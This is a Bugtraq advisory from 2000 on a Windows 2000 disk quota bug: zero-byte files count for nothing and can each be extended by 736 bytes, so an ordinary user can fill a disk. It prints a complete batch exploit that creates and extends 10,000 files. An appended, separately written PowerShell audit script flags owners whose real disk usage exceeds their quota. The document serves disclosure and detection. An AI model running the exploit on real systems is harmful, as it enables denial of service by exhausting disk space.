
List:       bugtraq
Subject:    Disk (over)quota in Windows 2000
From:       Dave Tarbatt - ACS <D.A.Tarbatt@bolton.ac.uk>
Date:       2000-02-28 14:00:04

I've been looking into disk quotas under Windows 2000 and have uncovered a
few anomalies. On top of a few peculiarities there appears to be a bug which
allows a user to exceed their disk quota by as much as they wish.

*** The problem:
Tested with Windows 2000 Professional build 2195 (release version). Existing
files can be extended even if a user is over quota. If exploited by a
malicious user it is at best a nuisance and at worst a DoS if the disk is
filled.

*** Description:
After playing around with the newly introduced disk quotas in Windows 2000 I
soon uncovered a bug which would allow an ordinary, unprivileged user to
exceed their allocated disk quota and fill a disk/partition. Under normal
circumstances, when a user is under quota, I discovered by experiment that new
files can be created up to a size of (Quota - UsedSpace + 2KB - 1byte), i.e.
they can go over quota by up to 2047 bytes. Not too much of a problem.
Extending existing files can be up to (Quota - UsedSpace + 1KB - 1byte), i.e. up
to 1023 bytes over quota - nothing much to be worried about.

However, if you are over quota, new file creation is only possible up to 728
bytes if (UsedSpace < Quota+1KB), i.e. you haven't gone more than 1KB
over quota. Existing files can be extended by up to 736 bytes up until
(UsedSpace >= Quota+1KB). Using this point alone, I created a lot of files
with "echo.>file0000" at 2 bytes each to use up the user's allocated disk quota
and extended them up to the 736 byte limit per file - I was now way over
quota.

The limit of how far over quota I could go depended on my initial quota and
how many tiny files I could create up until I hit the quota then extending
them all. Then I thought "What if I create 0 byte files?".

Oh dear! If you are under quota you can create as many 0 byte files as you
wish. They count towards nothing. Then extend these files by 736 bytes and
your disk starts filling up and up and up...

*** To recreate (typical example):
Create an ordinary unprivileged user and give them a disk quota of, say, 1MB.
Open a command prompt and, using whatever means you wish, create a lot of 0
byte files (e.g. SHIFT>FILE0000). Then append/extend those files by up to 736
bytes (e.g. ECHO 736-characters-here>>FILE0000). If you try to extend beyond
736 bytes, the file and its contents get chopped off at 674 bytes, so for
fast disk filling with fewer files don't try to go beyond 736 bytes.

See attachment for a batch file to create 10,000 of 0 byte files then extend
them all to 736 bytes.

*** Workaround/fix:
None known. However, to prevent DoS on servers you should not permit people
to write to the same partition that the operating system resides on.

Dave,

http://redirect.to/null/
PGP fingerprint: AE23 A19C 3E5E 74F4 2193  4BB3 E154 54AF


   ---- File information -----------
     File:  OverQuota.BAT
     Date:  25 Feb 2000, 22:03
     Size:  1008 bytes.
     Type:  Text


@echo off
echo Windows 2000 disk (over)quota exploit
echo Dave Tarbatt 26/02/2000 http://redirect.to/null/
rem
rem Create 10,000 zero byte files ('REM>filename' used to work but not any more)
echo Creating 10,000 zero byte files...
for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do shift>FILE%%i%%j%%k%%l rem
rem Create a 736 byte file (the largest extent that works)
echo Creating 736 byte file...
shift>736.txt
rem 23 x 16 = 368 "echo." lines of CRLF (2 bytes each) = 736 bytes
for %%i in (0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22) do for %%j in (0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15) do echo.>>736.txt rem
rem Appending the 736 byte file to all the empty ones (extend them)
echo Appending 736 bytes to all 10,000 files...
for %%i in (0 1 2 3 4 5 6 7 8 9) do for %%j in (0 1 2 3 4 5 6 7 8 9) do for %%k in (0 1 2 3 4 5 6 7 8 9) do for %%l in (0 1 2 3 4 5 6 7 8 9) do type 736.txt>>FILE%%i%%j%%k%%l rem
echo.
echo Done. Massively over quota!
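The post offers no fix beyond keeping user-writable data off the system partition, so a defender's only option is to notice the abuse. The script below is an added example, written for this page and not part of Dave's post or his attachment: it lists what the NTFS quota system believes each user has consumed (via fsutil) next to what is actually on disk, attributed to the owning account of each file, and counts the many-tiny-files pattern that the 0-byte-then-extend trick leaves behind. The volume letter, the per-user limit and the "tiny file" threshold are assumptions you set for your own environment; the 1,000-file alert threshold is likewise an arbitrary choice, not a value from the advisory.

```powershell
# Added example, not from the original advisory: audit a quota-enabled NTFS
# volume for owners whose on-disk total exceeds the configured limit and
# count the tiny-file pattern. Run from an elevated PowerShell prompt.
#
# Assumptions (not stated on the page): volume letter, per-user limit and
# the "tiny file" size threshold are site-specific parameters.
param(
    [string]$Volume         = 'D:',
    [int64] $QuotaBytes     = 1MB,   # limit configured on the volume for ordinary users
    [int]   $SmallFileBytes = 1024   # files smaller than this are counted as "tiny"
)

# What the quota system itself believes each user has consumed.
Write-Host "Quota accounting reported by NTFS for $Volume"
fsutil quota query $Volume

# What is actually on the disk, attributed to the owner recorded in each file's ACL.
$files = Get-ChildItem -LiteralPath "$Volume\" -Recurse -File -Force -ErrorAction SilentlyContinue

$tagged = foreach ($f in $files) {
    try   { $owner = (Get-Acl -LiteralPath $f.FullName).Owner }
    catch { $owner = '<access denied>' }
    [pscustomobject]@{ Owner = $owner; Length = $f.Length }
}

# Per-owner totals: real bytes on disk, file count, and how many are "tiny".
$report = $tagged | Group-Object -Property Owner | ForEach-Object {
    $total = [int64](($_.Group | Measure-Object -Property Length -Sum).Sum)
    $tiny  = @($_.Group | Where-Object { $_.Length -lt $SmallFileBytes }).Count
    [pscustomobject]@{
        Owner      = $_.Name
        Files      = $_.Count
        TinyFiles  = $tiny
        TotalBytes = $total
        OverQuota  = ($total -gt $QuotaBytes)
    }
}

# Flag owners over the limit, or holding an unusual number of tiny files
# (1000 is an arbitrary alert threshold; tune it to the share's normal use).
$report |
    Where-Object { $_.OverQuota -or $_.TinyFiles -gt 1000 } |
    Sort-Object -Property TotalBytes -Descending |
    Format-Table -AutoSize
```

The interesting output is the disagreement between the two views: an account whose fsutil figure sits at or just above its limit while its real on-disk total is far larger is exactly the condition the advisory describes. Walking a large volume with Get-Acl is slow, so run it off-hours or scope -LiteralPath to the user data tree rather than the whole drive.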


